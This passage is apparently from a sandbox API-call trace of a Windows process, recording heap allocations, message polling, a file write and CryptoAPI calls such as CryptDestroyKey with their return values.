dwFlags=0x0, lpMem=0x2e515e0 | out: hHeap=0x970000) returned 1 [0268.658] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515c8 | out: hHeap=0x970000) returned 1 [0268.658] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0268.658] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540f8 | out: hHeap=0x970000) returned 1 [0268.658] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f2e500 | out: hHeap=0x970000) returned 1 [0268.658] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0268.658] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ad8 | out: hHeap=0x970000) returned 1 [0268.658] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a60 | out: hHeap=0x970000) returned 1 [0268.658] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0268.658] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e544e0 | out: hHeap=0x970000) returned 1 [0268.658] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51898 | out: hHeap=0x970000) returned 1 [0268.658] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0268.658] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0268.658] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0268.658] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0268.658] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51718 | out: hHeap=0x970000) returned 1 [0268.658] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f16018 | out: hHeap=0x970000) returned 1 [0268.659] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0268.659] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51730 | out: hHeap=0x970000) returned 1 [0268.659] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51778 | out: hHeap=0x970000) returned 1 [0268.659] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517a8 | out: hHeap=0x970000) returned 1 [0268.659] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51820 | out: hHeap=0x970000) returned 1 [0268.659] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51808 | out: hHeap=0x970000) returned 1 [0268.659] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c78 | out: hHeap=0x970000) returned 1 [0268.659] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f1ade0 | out: hHeap=0x970000) returned 1 [0268.660] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0268.660] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c48 [0268.660] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4dc0) returned 0x2f38090 [0268.660] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f332c8 | out: hHeap=0x970000) returned 1 [0268.661] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0268.661] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0268.661] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f18 [0268.661] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0268.661] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a88 [0268.661] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0268.661] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a88 | out: hHeap=0x970000) returned 1 [0268.661] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0268.661] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51718 [0268.661] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51778 [0268.661] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55028 [0268.661] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0268.661] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51808 [0268.661] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55078 [0268.661] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fb8 [0268.661] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4dc0) returned 0x2f3ce58 [0268.662] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0268.662] WriteFile (in: hFile=0x2a0, lpBuffer=0x2f3ce58*, nNumberOfBytesToWrite=0x4dc0, lpNumberOfBytesWritten=0x8cf5e4, lpOverlapped=0x0 | out: lpBuffer=0x2f3ce58*, lpNumberOfBytesWritten=0x8cf5e4*=0x4dc0, lpOverlapped=0x0) returned 1 [0268.663] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51778 | out: hHeap=0x970000) returned 1 [0268.663] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f3ce58 | out: hHeap=0x970000) returned 1 [0268.663] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0268.663] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51808 | out: hHeap=0x970000) returned 1 [0268.663] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51718 | out: hHeap=0x970000) returned 1 [0268.663] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0268.663] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f38 [0268.663] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0268.663] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77888 | out: hHeap=0x970000) returned 1 [0268.663] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a48 | out: hHeap=0x970000) returned 1 [0268.663] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77788 | out: hHeap=0x970000) returned 1 [0268.663] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0268.663] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55068 [0268.663] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fe8 [0268.663] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b08 [0268.664] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b08 | out: hHeap=0x970000) returned 1 [0268.664] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0268.664] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0268.664] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51808 [0268.664] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51718 [0268.664] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51730 [0268.664] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e517a8 [0268.664] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51820 [0268.664] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51898 [0268.664] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51778 [0268.664] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e542d8 [0268.664] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51808 | out: hHeap=0x970000) returned 1 [0268.664] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e515c8 [0268.664] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55ea0 [0268.664] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55058 [0268.664] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0268.664] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55ea0 | out: hHeap=0x970000) returned 1 [0268.664] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0268.664] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51808 [0268.664] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54fb8 [0268.664] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515e0 [0268.664] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51928 [0268.664] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f58 [0268.664] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0268.664] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e519d0 [0268.664] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e544e0 [0268.664] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a18 [0268.664] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55048 [0268.665] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a18 | out: hHeap=0x970000) returned 1 [0268.665] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54378 [0268.665] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a18 [0268.665] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78bb8 [0268.665] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0268.665] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51aa8 [0268.665] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55058 [0268.665] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b50 [0268.665] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b68 [0268.665] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55068 [0268.665] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54350 [0268.665] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bb0 [0268.665] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ff8 [0268.665] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51940 [0268.665] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b08 [0268.665] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55018 [0268.665] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b50 | out: hHeap=0x970000) returned 1 [0268.665] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a60 [0268.665] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518e0 [0268.665] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f48 [0268.665] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55ca8 [0268.665] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55028 [0268.665] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0268.665] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55ca8 | out: hHeap=0x970000) returned 1 [0268.665] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0268.665] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e518c8 [0268.665] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0268.665] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0268.666] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55038 [0268.666] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550a8 [0268.666] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0268.666] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0268.666] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0268.666] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518c8 | out: hHeap=0x970000) returned 1 [0268.666] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0268.666] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ac0 [0268.666] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550f8 [0268.666] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b98 [0268.666] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0268.666] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a30 [0268.666] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0268.666] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51958 [0268.666] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0268.666] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b80 [0268.666] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f98 [0268.666] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519a0 [0268.666] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0268.666] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54170 [0268.666] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a60 | out: hHeap=0x970000) returned 1 [0268.666] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518c8 [0268.666] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55028 [0268.666] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0268.666] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f18 [0268.666] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51970 [0268.666] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0268.666] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ad8 [0268.666] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550a8 [0268.667] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550c8 [0268.667] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51988 [0268.667] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ad8 | out: hHeap=0x970000) returned 1 [0268.667] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0268.667] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51988 | out: hHeap=0x970000) returned 1 [0268.667] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0268.667] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ad8 [0268.667] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55108 [0268.667] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51988 [0268.667] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f58 [0268.667] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f68 [0268.667] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518f8 [0268.667] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51988 | out: hHeap=0x970000) returned 1 [0268.667] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0268.667] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518f8 | out: hHeap=0x970000) returned 1 [0268.667] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0268.667] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51af0 [0268.667] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f38 [0268.667] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0268.667] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51988 [0268.667] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x2e51988, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0268.667] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51988 | out: hHeap=0x970000) returned 1 [0268.667] GetProcAddress (hModule=0x756e0000, lpProcName="CryptDestroyKey") returned 0x756ffa60 [0268.668] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51af0 | out: hHeap=0x970000) returned 1 [0268.668] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0268.668] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a60 [0268.668] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55078 [0268.668] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0268.668] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a60 | out: hHeap=0x970000) returned 1 [0268.668] CryptDestroyKey (hKey=0xa872d0) returned 1 [0268.668] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2f14260 [0268.668] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55078 [0268.668] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55088 [0268.668] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51af0 [0268.668] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b20 [0268.668] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51988 [0268.668] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55098 [0268.668] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51988 | out: hHeap=0x970000) returned 1 [0268.668] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0268.668] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b20 | out: hHeap=0x970000) returned 1 [0268.668] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a48 [0268.668] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51988 [0268.668] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a60 [0268.668] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f58 [0268.668] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a60 | out: hHeap=0x970000) returned 1 [0268.668] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0268.668] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51988 | out: hHeap=0x970000) returned 1 [0268.668] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0268.668] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ad8 | out: hHeap=0x970000) returned 1 [0268.668] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51970 | out: hHeap=0x970000) returned 1 [0268.668] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0268.669] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518e0 | out: hHeap=0x970000) returned 1 [0268.669] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b98 | out: hHeap=0x970000) returned 1 [0268.669] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ac0 | out: hHeap=0x970000) returned 1 [0268.669] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51958 | out: hHeap=0x970000) returned 1 [0268.669] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a30 | out: hHeap=0x970000) returned 1 [0268.669] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519a0 | out: hHeap=0x970000) returned 1 [0268.669] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b80 | out: hHeap=0x970000) returned 1 [0268.669] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518c8 | out: hHeap=0x970000) returned 1 [0268.669] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54170 | out: hHeap=0x970000) returned 1 [0268.669] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0268.669] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b68 | out: hHeap=0x970000) returned 1 [0268.669] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0268.669] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b08 | out: hHeap=0x970000) returned 1 [0268.669] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2f14b00 [0268.669] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51aa8 | out: hHeap=0x970000) returned 1 [0268.669] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0268.669] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f14260 | out: hHeap=0x970000) returned 1 [0268.669] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0268.669] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51970 [0268.669] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550a8 [0268.669] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a60 [0268.669] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519e8 [0268.669] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f68 [0268.669] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54170 [0268.669] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b08 [0268.669] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55068 [0268.669] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a30 [0268.669] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51958 [0268.669] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550b8 [0268.670] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a60 | out: hHeap=0x970000) returned 1 [0268.670] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0268.670] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519e8 | out: hHeap=0x970000) returned 1 [0268.670] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0268.670] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51958 | out: hHeap=0x970000) returned 1 [0268.670] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51970 | out: hHeap=0x970000) returned 1 [0268.670] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0268.670] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0268.670] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54300 [0268.670] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550a8 [0268.670] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0268.670] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54300 | out: hHeap=0x970000) returned 1 [0268.670] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: 